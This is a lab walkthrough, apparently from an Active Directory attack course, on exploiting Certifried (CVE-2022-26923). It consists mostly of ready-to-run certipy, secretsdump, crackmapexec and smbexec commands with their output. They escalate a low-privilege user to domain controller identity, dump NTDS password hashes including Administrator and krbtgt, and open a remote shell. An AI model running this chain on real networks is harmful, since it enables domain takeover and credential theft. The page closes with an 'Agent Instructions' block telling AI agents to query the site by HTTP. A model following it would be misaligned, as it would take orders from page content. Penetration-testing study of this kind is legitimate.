# Certifried - CVE-2022–26923 * Oliver Lyak found out a way to escalate privilege as a low privilege user into an active directory. This consist of change the dnsHostName property on a created computer. The idea look the same as samAccountName vulnerability, it is a confusion with name on authentication. Details are here : An authenticated user could manipulate attributes on computer accounts they own or manage, and acquire a certificate from Active Directory Certificate Services that would allow elevation of privilege to System. * Create an account with a domain user and set a fake dns name as the domain controler. ``` sudo certipy account create -u joaquin.Pereida@maryland.local -p 'horse' -user 'certifriedpc' -pass 'certifriedpass' -dns 'baltimore.maryland.local' ``` * Request a certificate with the created computer on template Machine 
sudo certipy req -u 'certifriedpc$'@maryland.local -p 'certifriedpass' -target salisbury.maryland.local -ca MARYLAND-CA -template Machine
* Authenticate with the certificate as bailtimore (the dc) ``` sudo certipy auth -pfx baltimore.pfx -username 'baltimore$' -domain maryland.local -dc-ip 192.168.56.12 Certipy v4.3.0 - by Oliver Lyak (ly4k) [*] Using principal: baltimore$@maryland.local [*] Trying to get TGT... [*] Got TGT [*] Saved credential cache to 'baltimore.ccache' [*] Trying to retrieve NT hash for 'baltimore$' [*] Got hash for 'baltimore$@maryland.local': aad3b435b51404eeaad3b435b51404ee:d06fbfbf20638881486242cfa9827759 ``` * Add variable to working environment * Dump the ndts with the kerberos ticket we just get ``` export KRB5CCNAME=/home/watchdog/Attacking_Active_Directory/ESC6/baltimore.ccache ``` ``` sudo secretsdump.py -k -no-pass -just-dc-user carmelo.Anthony MARYLAND.LOCAL/'baltimore$'@baltimore.maryland.local Impacket v0.10.1.dev1+20230216.13520.d4c06e7f - Copyright 2022 Fortra [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash) [*] Using the DRSUAPI method to get NTDS.DIT secrets carmelo.Anthony:1110:aad3b435b51404eeaad3b435b51404ee:34534854d33b398b66684072224bb47a::: [*] Kerberos keys grabbed carmelo.Anthony:aes256-cts-hmac-sha1-96:da49788946f1189c92fda8683bd91bc0b18933a0cb5770d30c9f4648b9fefb20 carmelo.Anthony:aes128-cts-hmac-sha1-96:e728e401a5678362449ceacd2b53dec9 carmelo.Anthony:des-cbc-md5:5ed5d58f941ac4d3 [*] Cleaning up... ``` * delete the created computer with a domain admin user 
sudo certipy account delete -u carmelo.Anthony@maryland.local -hashes 'aad3b435b51404eeaad3b435b51404ee:34534854d33b398b66684072224bb47a' -user 'certifriedpc'
Dump or get Exec ``` crackmapexec smb 192.168.56.12 -u carmelo.anthony -H 'ad3b435b51404eeaad3b435b51404ee:34534854d33b398b66684072224bb47a' --ntds "class": algorithms.Blowfish, SMB 192.168.56.12 445 BALTIMORE [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:BALTIMORE) (domain:maryland.local) (signing:True) (SMBv1:True) SMB 192.168.56.12 445 BALTIMORE [+] maryland.local\carmelo.anthony:34534854d33b398b66684072224bb47a (Pwn3d!) SMB 192.168.56.12 445 BALTIMORE [+] Dumping the NTDS, this could take a while so go grab a redbull... SMB 192.168.56.12 445 BALTIMORE Administrator:500:aad3b435b51404eeaad3b435b51404ee:54296a48cd30259cc88095373cec24da::: SMB 192.168.56.12 445 BALTIMORE Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: SMB 192.168.56.12 445 BALTIMORE krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1ad253c7f9110449bd1ccbcadf2ca611::: SMB 192.168.56.12 445 BALTIMORE DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: SMB 192.168.56.12 445 BALTIMORE vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: SMB 192.168.56.12 445 BALTIMORE carmelo.Anthony:1110:aad3b435b51404eeaad3b435b51404ee:34534854d33b398b66684072224bb47a::: SMB 192.168.56.12 445 BALTIMORE marisol.Pedrosa:1111:aad3b435b51404eeaad3b435b51404ee:fd208d19680104ddb8e3d90962c0334e::: SMB 192.168.56.12 445 BALTIMORE joaquin.Pereida:1112:aad3b435b51404eeaad3b435b51404ee:739120ebc4dd940310bc4bb5c9d37021::: SMB 192.168.56.12 445 BALTIMORE teresa.Perez:1113:aad3b435b51404eeaad3b435b51404ee:4d737ec9ecf0b9955a161773cfed9611::: SMB 192.168.56.12 445 BALTIMORE sql_svc:1114:aad3b435b51404eeaad3b435b51404ee:84a5092f53390ea48d660be52b93b804::: SMB 192.168.56.12 445 BALTIMORE BALTIMORE$:1001:aad3b435b51404eeaad3b435b51404ee:d06fbfbf20638881486242cfa9827759::: SMB 192.168.56.12 445 BALTIMORE SALISBURY$:1104:aad3b435b51404eeaad3b435b51404ee:12df918c6cba0ab538b68f10071a1fa5::: SMB 192.168.56.12 445 BALTIMORE newyork$:1105:aad3b435b51404eeaad3b435b51404ee:16827e6dccaaa8328e7092324980f207::: ``` ``` smbexec.py -hashes ad3b435b51404eeaad3b435b51404ee:34534854d33b398b66684072224bb47a 'MARYLAND'/'carmelo.anthony'@'maryland.local' ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://watchdogsacademy.gitbook.io/attacking-active-directory/active-directory-certificate-services-adcs/certifried-cve-2022-26923.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.